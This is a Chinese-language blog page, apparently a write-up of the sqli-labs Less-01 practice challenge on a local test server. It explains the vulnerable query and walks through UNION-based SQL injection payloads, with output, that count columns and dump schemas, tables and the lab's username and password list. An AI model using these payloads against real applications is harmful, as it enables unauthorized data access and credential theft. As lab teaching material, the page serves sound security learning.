<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>Less-01 | Hexo</title>

  <!-- keywords -->
  

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="Less-01  用’1‘进行包裹">
<meta property="og:type" content="article">
<meta property="og:title" content="Less-01">
<meta property="og:url" content="http://example.com/2020/12/06/mysql/mysql-2/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Less-01  用’1‘进行包裹">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2020-12-05T17:39:23.000Z">
<meta property="article:modified_time" content="2020-12-06T04:33:42.000Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
  
    <link rel="alternative" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  

  
<script src="//cdn.bootcss.com/require.js/2.3.2/require.min.js"></script>

  
<script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>


  
<meta name="generator" content="Hexo 5.4.0"></head>
<body>
  <div id="container">
    <div id="particles-js"></div>
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
	<header id="header" class="inner">
		<a href="/" class="profilepic">
			
			<img lazy-src="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg" class="js-avatar">
			
		</a>

		<hgroup>
		  <h1 class="header-author"><a href="/"></a></h1>
		</hgroup>

		

		
			<div class="switch-btn">
				<div class="icon">
					<div class="icon-ctn">
						<div class="icon-wrap icon-house" data-idx="0">
							<div class="birdhouse"></div>
							<div class="birdhouse_holes"></div>
						</div>
						<div class="icon-wrap icon-ribbon hide" data-idx="1">
							<div class="ribbon"></div>
						</div>
						
						<div class="icon-wrap icon-link hide" data-idx="2">
							<div class="loopback_l"></div>
							<div class="loopback_r"></div>
						</div>
						
						
					</div>
					
				</div>
				<div class="tips-box hide">
					<div class="tips-arrow"></div>
					<ul class="tips-inner">
						<li>菜单</li>
						<li>标签</li>
						
						<li>友情链接</li>
						
						
					</ul>
				</div>
			</div>
		

		<div class="switch-area">
			<div class="switch-wrap">
				<section class="switch-part switch-part1">
					<nav class="header-menu">
						<ul>
						
							<li><a href="/">主页</a></li>
				        
							<li><a href="/archives">所有文章</a></li>
				        
						</ul>
					</nav>
					<nav class="header-nav">
						<div class="social">
							
								<a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
					        
						</div>
					</nav>
				</section>
				
				
				<section class="switch-part switch-part2">
					<div class="widget tagcloud" id="js-tagcloud">
						
					</div>
				</section>
				
				
				
				<section class="switch-part switch-part3">
					<div id="js-friends">
					
			          <a target="_blank" class="main-nav-link switch-friends-link" href="https://github.com/smackgg/hexo-theme-smackdown">smackdown</a>
			        
			        </div>
				</section>
				

				
			</div>
		</div>
	</header>				
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
  	<div class="overlay">
  		<div class="slider-trigger"></div>
  		<h1 class="header-author js-mobile-header hide"></h1>
  	</div>
	<div class="intrude-less">
		<header id="header" class="inner">
			<div class="profilepic">
				<img lazy-src="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg" class="js-avatar">
			</div>
			<hgroup>
			  <h1 class="header-author"></h1>
			</hgroup>
			
			<nav class="header-menu">
				<ul>
				
					<li><a href="/">主页</a></li>
		        
					<li><a href="/archives">所有文章</a></li>
		        
		        <div class="clearfix"></div>
				</ul>
			</nav>
			<nav class="header-nav">
				<div class="social">
					
						<a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
			        
				</div>
			</nav>
		</header>				
	</div>
</nav>
      <div class="body-wrap"><article id="post-mysql/mysql-2" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2020/12/06/mysql/mysql-2/" class="article-date">
  	<time datetime="2020-12-05T17:39:23.000Z" itemprop="datePublished">2020-12-06</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Less-01
      
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="Less-01-用’1‘进行包裹"><a href="#Less-01-用’1‘进行包裹" class="headerlink" title="Less-01  用’1‘进行包裹"></a>Less-01  用’1‘进行包裹<span id="more"></span></h1><h4 id="一、理解句子意义"><a href="#一、理解句子意义" class="headerlink" title="一、理解句子意义"></a>一、理解句子意义</h4><h5 id="SELECT-FROM-users-WHERE-id-’1’-LIMIT-0-1"><a href="#SELECT-FROM-users-WHERE-id-’1’-LIMIT-0-1" class="headerlink" title="SELECT * FROM users WHERE id=’1’ LIMIT 0,1;"></a><strong>SELECT * FROM users WHERE id=’1’ LIMIT 0,1;</strong></h5><p> <strong>limit0,1；</strong></p>
<p>第一位代表从第几个开始，第二位代表的是显示多少位数据。</p>
<p>其中0代表从第1个开始，1代表的是显示1位数据。</p>
<p>SELECT * FROM users WHERE id=’1**’or 1=1–** ‘ LIMIT 0,1</p>
<p>从users中选择所有的数据使用where来定位id=1</p>
<p>注释符：  –+  或者   –空格    或者   #   （注释后表示后面的句子不再执行）</p>
<p>A and B 两个必须都正确才是true</p>
<p>A or B 两个中有一个正确就是true</p>
<p>or1=1代表这句话永远正确，无论前面的句子如何写，只要进行闭合，句子永远正确。</p>
<h4 id="二、函数"><a href="#二、函数" class="headerlink" title="二、函数"></a>二、函数</h4><p>显示系统用户                     select system_user();  </p>
<p>显示登录用户                     select user();   </p>
<p>显示数据库                         select database();</p>
<p>显示版本信息                     select version();</p>
<p>显示mysql安装路径           select @@datadir；</p>
<p>显示当前操作系统              select @@version_compile_os;</p>
<h4 id="三、在1后面添加’"><a href="#三、在1后面添加’" class="headerlink" title="三、在1后面添加’"></a>三、在1后面添加’</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=&#x27;1&#x27;&#x27; LIMIT 0,1</span><br><span class="line">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#x27;&#x27;1&#x27;&#x27; LIMIT 0,1&#x27; at line 1</span><br></pre></td></tr></table></figure>

<p>多了一个‘</p>
<p>Sql 语句为$sql=”SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”;<br>Id 参数在拼接 sql 语句时，未对 id 进行任何的过滤等操作，所以当提交 ‘or 1=1–+，直接构<br>造的 sql 语句就是<br>SELECT * FROM users WHERE id=’1’or 1=1–+ LIMIT 0,1<br>这条语句因 or 1=1 所以为永恒真。</p>
<h4 id="四、order-by"><a href="#四、order-by" class="headerlink" title="四、order by"></a>四、order by</h4><p><strong>order by</strong> 对列进行排序，<strong>结合二分法</strong>，超出列的会报错（可知道数据的列数）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=&#x27;1&#x27;order by 4-- &#x27; LIMIT 0,1</span><br><span class="line">Unknown column &#x27;4&#x27; in &#x27;order clause&#x27;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=&#x27;1&#x27;order by 3 -- &#x27; LIMIT 0,1</span><br><span class="line">Your Login name:Dumb</span><br><span class="line">Your Password:Dumb</span><br></pre></td></tr></table></figure>

<p>数据列数为3列</p>
<h4 id="五、union-select"><a href="#五、union-select" class="headerlink" title="五、union select"></a>五、union select</h4><p>1.在数据列数为3的前提下，用union select来看看那个数据可以回显</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=&#x27;1&#x27;union select 1,2,3-- &#x27; LIMIT 0,1</span><br><span class="line">Your Login name:Dumb</span><br><span class="line">Your Password:Dumb</span><br><span class="line"></span><br><span class="line">mysql&gt; SELECT * FROM users WHERE id=&#x27;1&#x27;union select 1,2,3;</span><br><span class="line">+----+----------+----------+</span><br><span class="line">| id | username | password |</span><br><span class="line">+----+----------+----------+</span><br><span class="line">|  1 | Dumb     | Dumb     |</span><br><span class="line">|  1 | 2        | 3        |</span><br><span class="line">+----+----------+----------+</span><br></pre></td></tr></table></figure>

<p>得到id=1的数据，此时没有回显，可以将1改为-1，使前面报错，后面显示出来</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=&#x27;-1&#x27;union select 1,2,3-- &#x27; LIMIT 0,1</span><br><span class="line">Your Login name:2</span><br><span class="line">Your Password:3</span><br><span class="line"></span><br><span class="line">mysql&gt; SELECT * FROM users WHERE id=&#x27;-1&#x27;union select 1,2,3;</span><br><span class="line">+----+----------+----------+</span><br><span class="line">| id | username | password |</span><br><span class="line">+----+----------+----------+</span><br><span class="line">|  1 | 2        | 3        |</span><br><span class="line">+----+----------+----------+</span><br></pre></td></tr></table></figure>

<p>此时我们发现，第二个和第三个位置我们可以使用。</p>
<h4 id="六、爆信息"><a href="#六、爆信息" class="headerlink" title="六、爆信息"></a>六、爆信息</h4><p>1.下面我们可以利用第三个位置来<strong>爆数据库</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select schema_name from information_schema.schemata;</span><br><span class="line">+--------------------+</span><br><span class="line">| schema_name        |</span><br><span class="line">+--------------------+</span><br><span class="line">| information_schema |</span><br><span class="line">| challenges         |</span><br><span class="line">| mysql              |</span><br><span class="line">| performance_schema |</span><br><span class="line">| security           |</span><br><span class="line">| sys                |</span><br><span class="line">+--------------------+</span><br></pre></td></tr></table></figure>

<p>下面是数据库的第一个数据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=&#x27;-1&#x27;union select 1,2,schema_name from information_schema.schemata limit 0,1-- &#x27; LIMIT 0,1</span><br><span class="line">Your Login name:2</span><br><span class="line">Your Password:information_schema</span><br></pre></td></tr></table></figure>

<p>下面是数据库的第二个数据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=&#x27;-1&#x27;union select 1,2,schema_name from information_schema.schemata limit 1,1-- &#x27; LIMIT 0,1</span><br><span class="line">Your Login name:2</span><br><span class="line">Your Password:challenges</span><br></pre></td></tr></table></figure>

<p>下面用<strong>group_contact（）</strong>对数据进行拼接</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=&#x27;-1&#x27;union select 1,2,group_concat(schema_name) from information_schema.schemata -- &#x27; LIMIT 0,1</span><br><span class="line">Your Login name:2</span><br><span class="line">Your Password:information_schema,challenges,mysql,performance_schema,security,sys</span><br></pre></td></tr></table></figure>

<p>2.下面我们还可以利用第二个位置来<strong>爆 security 数据库的数据表</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select table_name from information_schema.tables where table_schema=&#x27;security&#x27;;</span><br><span class="line">+------------+</span><br><span class="line">| table_name |</span><br><span class="line">+------------+</span><br><span class="line">| emails     |</span><br><span class="line">| referers   |</span><br><span class="line">| uagents    |</span><br><span class="line">| users      |</span><br><span class="line">+------------+</span><br></pre></td></tr></table></figure>

<p>下面用<strong>group_contact（）</strong>对数据进行拼接</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=&#x27;-1&#x27;union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&#x27;security&#x27;-- &#x27; LIMIT 0,1</span><br><span class="line">Your Login name:emails,referers,uagents,users</span><br><span class="line">Your Password:3</span><br></pre></td></tr></table></figure>

<p>3.下面我们还可以利用第二个位置来<strong>爆 users 表的列</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select column_name from information_schema.columns where table_name=&#x27;users&#x27;;</span><br><span class="line">+---------------------+</span><br><span class="line">| column_name         |</span><br><span class="line">+---------------------+</span><br><span class="line">| USER                |</span><br><span class="line">| CURRENT_CONNECTIONS |</span><br><span class="line">| TOTAL_CONNECTIONS   |</span><br><span class="line">| id                  |</span><br><span class="line">| username            |</span><br><span class="line">| password            |</span><br><span class="line">+---------------------+</span><br></pre></td></tr></table></figure>

<p>下面用<strong>group_contact（）</strong>对数据进行拼接</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=&#x27;-1&#x27;union select 1,group_concat(column_name),3 from information_schema.columns where table_name=&#x27;users&#x27;-- &#x27; LIMIT 0,1</span><br><span class="line">Your Login name:USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS，id,username,password</span><br><span class="line">Your Password:3</span><br></pre></td></tr></table></figure>

<p>4.下面我们还可以利用第二个位置来<strong>爆数据</strong></p>
<p>（1)爆单个数据</p>
<p>这是id=2的数据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=&#x27;-1&#x27;union select 1,username,password from users where id=2-- &#x27; LIMIT 0,1</span><br><span class="line">Your Login name:Angelina</span><br><span class="line">Your Password:I-kill-you</span><br></pre></td></tr></table></figure>

<p>这是id=6的数据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=&#x27;-1&#x27;union select 1,username,password from users where id=6-- &#x27; LIMIT 0,1</span><br><span class="line">Your Login name:superman</span><br><span class="line">Your Password:genious</span><br></pre></td></tr></table></figure>

<p>（2）爆所有数据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt;  select id,username,password from security.users;</span><br><span class="line">+----+----------+------------+</span><br><span class="line">| id | username | password   |</span><br><span class="line">+----+----------+------------+</span><br><span class="line">|  1 | Dumb     | Dumb       |</span><br><span class="line">|  2 | Angelina | I-kill-you |</span><br><span class="line">|  3 | Dummy    | p@ssword   |</span><br><span class="line">|  4 | secure   | crappy     |</span><br><span class="line">|  5 | stupid   | stupidity  |</span><br><span class="line">|  6 | superman | genious    |</span><br><span class="line">|  7 | batman   | mob!le     |</span><br><span class="line">|  8 | admin    | admin      |</span><br><span class="line">|  9 | admin1   | admin1     |</span><br><span class="line">| 10 | admin2   | admin2     |</span><br><span class="line">| 11 | admin3   | admin3     |</span><br><span class="line">| 12 | dhakkan  | dumbo      |</span><br><span class="line">| 14 | admin4   | admin4     |</span><br><span class="line">+----+----------+------------+</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=&#x27;-1&#x27;union select 1,2,group_concat(password)from security.users -- &#x27; LIMIT 0,1</span><br><span class="line">Your Login name:2</span><br><span class="line">Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4</span><br></pre></td></tr></table></figure>

<p>但是这样的数据显示不便于观看，所以需要用到函数<strong>concat_ws()</strong></p>
<p>举个例了concat_ws(‘~’,A,B)</p>
<p>显示效果   A~B</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=&#x27;-1&#x27;union select 1,2,concat_ws(&#x27;~&#x27;,username,password)from security.users -- &#x27; LIMIT 0,1</span><br><span class="line">Your Login name:2</span><br><span class="line">Your Password:Dumb~Dumb</span><br></pre></td></tr></table></figure>

<p>此时只显示一个数据，所以我们还需要再次利用函数<strong>group_concat()</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=&#x27;-1&#x27;union select 1,2,group_concat(concat_ws(&#x27;~&#x27;,username,password))from security.users -- &#x27; LIMIT 0,1</span><br><span class="line">Your Login name:2</span><br><span class="line">Your Password:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4</span><br></pre></td></tr></table></figure>

<h4 id="七、总结"><a href="#七、总结" class="headerlink" title="七、总结"></a>七、总结</h4><p>1.查看是否有注入</p>
<p>http：//127.0.0.1/sqli/Less-1/?id=1**’**</p>
<p>2.查看有多少列</p>
<p>http：//127.0.0.1/sqli/Less-1/?id=1**’ order by 3–+**</p>
<p>3.查看哪些数据可以回显</p>
<p>http：//127.0.0.1/sqli/Less-1/?id=<strong>-1’ union select 1,2,3–+</strong></p>
<p>4.爆数据库，爆表，爆列，爆数据，并用符号~分割</p>

      
    </div>
    
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/12/06/mysql/mysql-3/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">&lt;</strong>
      <div class="article-nav-title">
        
          Less 2~4
        
      </div>
    </a>
  
  
    <a href="/2020/12/05/mysql/mysql-1/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">mysql基础学习</div>
      <strong class="article-nav-caption">&gt;</strong>
    </a>
  
</nav>

  
</article>


<div class="ds-share share" data-thread-key="mysql/mysql-2" data-title="Less-01" data-url="http://example.com/2020/12/06/mysql/mysql-2/"  data-images="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg" data-content="Less-01">
    <div class="ds-share-inline">
      <ul  class="ds-share-icons-16">
      	<li data-toggle="ds-share-icons-more"><a class="ds-more" href="javascript:void(0);">分享到：</a></li>
        <li><a class="ds-weibo" href="javascript:void(0);" data-service="weibo">微博</a></li>
        <li><a class="ds-qzone" href="javascript:void(0);" data-service="qzone">QQ空间</a></li>
        <li><a class="ds-qqt" href="javascript:void(0);" data-service="qqt">腾讯微博</a></li>
        <li><a class="ds-wechat" href="javascript:void(0);" data-service="wechat">微信</a></li>
      </ul>
      <div class="ds-share-icons-more">
      </div>
    </div>
 </div>
 





</div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info">
      <div class="footer-left">
        &copy; 2021 John Doe
      </div>
        <div class="footer-right">
          <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/smackgg/hexo-theme-smackdown" target="_blank">Smackdown</a>
        </div>
    </div>
  </div>
</footer>
    </div>
    
  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">



<script>
	var yiliaConfig = {
		fancybox: true,
		mathjax: true,
		animate: true,
		isHome: false,
		isPost: true,
		isArchive: false,
		isTag: false,
		isCategory: false,
		open_in_new: false
	}
</script>

<script src="/js/main.js"></script>




<script type="text/x-mathjax-config">
MathJax.Hub.Config({
    tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    }
});

MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';                 
    }       
});
</script>

<script src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js"></script>


  </div>
</body>
</html>